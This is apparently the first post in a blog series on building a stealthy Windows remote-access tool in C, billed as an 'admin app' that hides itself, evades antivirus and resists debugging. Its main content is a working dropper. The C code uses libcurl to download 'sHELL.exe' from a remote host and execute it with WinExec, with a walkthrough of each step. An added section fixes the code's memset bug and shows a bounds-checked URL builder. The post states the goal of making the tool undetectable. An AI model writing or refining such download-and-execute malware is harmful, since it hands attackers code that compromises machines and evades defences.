Ever wanted a stealthy *Admin App 😉 that can hide itself? Restore itself? Update itself? Communicate without Eavesdroppers? Has anti debugging techniques? and can bypass common AV? Yea, me too. So we will build one in C, because C is also good to learn for pentesting, reversing, CTFs and much more. I am an experienced programmer but C is my weakest language so if I make n00b mistakes please tell me and help me out a little ❤

Dropper.c

I have had this code for years, it served me well and was originally taken from a book called Advanced Persistent Threat Hacking, which was quite good from what I remember.

What it does…

Housekeeping, like imports and definitions…

#define PTL "https"
#define DMN "10.10.10.10"
#define FLE "sHELL.exe"
#define CURL_STATICLIB
#include <stdio.h>
#include <string.h>    /* memset, strcat */
#include <windows.h>   /* WinExec */
#include <curl/curl.h>

#include <file>

This variant is used for system header files. It searches for a file named file in a standard list of system directories.

#include "file"

This variant is used for header files of your own program. It searches for a file named file first in the directory containing the current file, then in the quote directories and then the same directories used for <file>.

Callback Function

We need to give curl a write callback. This is standard libcurl usage and is shown in the example docs here: https://curl.haxx.se/libcurl/c/getinmemory.html

Ours is simple: it casts the user pointer back to a FILE*, writes the buffer to it and returns the number of items written (libcurl aborts the transfer if this does not match what it handed us)…

size_t write_callback(void *buffer, size_t size, size_t nitems, void *userp){
    /* userp is whatever we passed with CURLOPT_WRITEDATA: our output FILE* */
    FILE *file = (FILE*)userp;
    size_t written;
    /* libcurl always calls this with size == 1, so the item count is the byte count */
    written = fwrite(buffer, size, nitems, file);
    return written;
}

Main

Here we first declare our variables, then concatenate the PTL (protocol), DMN (domain) and FLE (file) definitions to build the URL we will request (https://10.10.10.10/sHELL.exe).

Then we use curl to fetch the file and save it through our callback, clean up (the curl handle and the file handle) and finally execute the downloaded file.

int main(void)
{
    CURL *curl;
    CURLcode res = CURLE_FAILED_INIT;   /* stays set if curl_easy_init() fails */
    FILE *outFile;
    char finalURL[512];

    outFile = fopen(FLE, "wb");
    if (outFile == NULL) {
        return 1;   /* nowhere to write the download */
    }

    /* memset takes (dest, value, count); the original had value and count
       swapped, which writes zero bytes and leaves the buffer uninitialised
       for the strcat calls below */
    memset(finalURL, '\0', sizeof(finalURL));
    strcat(finalURL, PTL);
    strcat(finalURL, "://");
    strcat(finalURL, DMN);
    strcat(finalURL, "/");
    strcat(finalURL, FLE);

    curl = curl_easy_init();
    if (curl) {
        curl_easy_setopt(curl, CURLOPT_URL, finalURL);
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, outFile);
        res = curl_easy_perform(curl);
        curl_easy_cleanup(curl);
    }
    fclose(outFile);   /* always close, even if curl_easy_init() failed */

    /* only run the file if the transfer actually completed */
    if (res == CURLE_OK) {
        WinExec(FLE, 0);
    }
    return 0;
}
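Two things in the original main are worth seeing in isolation, because they are classic C mistakes rather than anything curl-specific: memset with its value and count arguments swapped silently clears nothing, and strcat into a fixed buffer has no way to report that the pieces did not fit. The block below is an added example (not code from the post or the BillyGates repository, and it needs no libcurl or Windows headers). It measures what the swapped memset really does and shows a bounds-checked snprintf replacement for the strcat chain; the function names and the sample protocol/host/file values are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Call memset with the argument order the post used: memset(buf, sizeof(buf), '\0').
   Returns how many bytes ended up zero. */
size_t bytes_cleared_by_swapped_memset(void)
{
    char buf[64];
    memset(buf, 'X', sizeof(buf));          /* known non-zero contents first */

    /* what the swapped call actually passes: value = 64, count = 0 */
    int    value = (int)sizeof(buf);
    size_t count = (size_t)'\0';
    memset(buf, value, count);              /* overwrites zero bytes */

    size_t cleared = 0;
    for (size_t i = 0; i < sizeof(buf); i++)
        if (buf[i] == '\0')
            cleared++;
    return cleared;                         /* 0: buffer is untouched */
}

/* Same measurement with the correct order: memset(buf, '\0', sizeof(buf)). */
size_t bytes_cleared_by_correct_memset(void)
{
    char buf[64];
    memset(buf, 'X', sizeof(buf));
    memset(buf, '\0', sizeof(buf));

    size_t cleared = 0;
    for (size_t i = 0; i < sizeof(buf); i++)
        if (buf[i] == '\0')
            cleared++;
    return cleared;                         /* 64: every byte cleared */
}

/* Build "proto://host/path" into out[cap] with one bounds-checked call instead of
   five strcat calls. Returns 0 on success, -1 (and an empty string) if the result
   would not fit including the terminating NUL, so a truncated URL is never used. */
int build_url(char *out, size_t cap, const char *proto, const char *host, const char *path)
{
    if (out == NULL || cap == 0 || proto == NULL || host == NULL || path == NULL)
        return -1;

    int n = snprintf(out, cap, "%s://%s/%s", proto, host, path);
    if (n < 0 || (size_t)n >= cap) {
        out[0] = '\0';                      /* do not leave a half-built URL behind */
        return -1;
    }
    return 0;
}

/* Constructed sample mirroring the post's #defines; returns 1 if the URL matches. */
int demo_build_url_ok(void)
{
    char url[512];
    if (build_url(url, sizeof(url), "https", "10.10.10.10", "sHELL.exe") != 0)
        return 0;
    return strcmp(url, "https://10.10.10.10/sHELL.exe") == 0;
}

/* Same input into a buffer that is too small; returns 1 if it was rejected cleanly. */
int demo_build_url_too_small(void)
{
    char url[16];
    int rc = build_url(url, sizeof(url), "https", "10.10.10.10", "sHELL.exe");
    return rc == -1 && url[0] == '\0';
}

int main(void)
{
    printf("swapped memset cleared %zu bytes\n", bytes_cleared_by_swapped_memset());
    printf("correct memset cleared %zu bytes\n", bytes_cleared_by_correct_memset());
    printf("build_url ok: %d, rejects small buffer: %d\n",
           demo_build_url_ok(), demo_build_url_too_small());
    return 0;
}
```

The swapped memset is not harmless in the original: strcat looks for the first NUL in finalURL before appending, so on an uninitialised buffer it appends to whatever garbage is on the stack and can run past the 512 bytes. snprintf with a checked return value fixes both problems at once, and the -1 path is what you want to branch on before handing the string to curl.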

This code is basic and could be improved a lot; some parts are also quite dated and very easy to detect, so we will work on improving these parts in future BillyGates posts. Over time we will develop BillyGates into an effective undetectable remote admin app for Windows.

int0x33/BillyGates (github.com): Billy Gates is an admin app for Windows xD.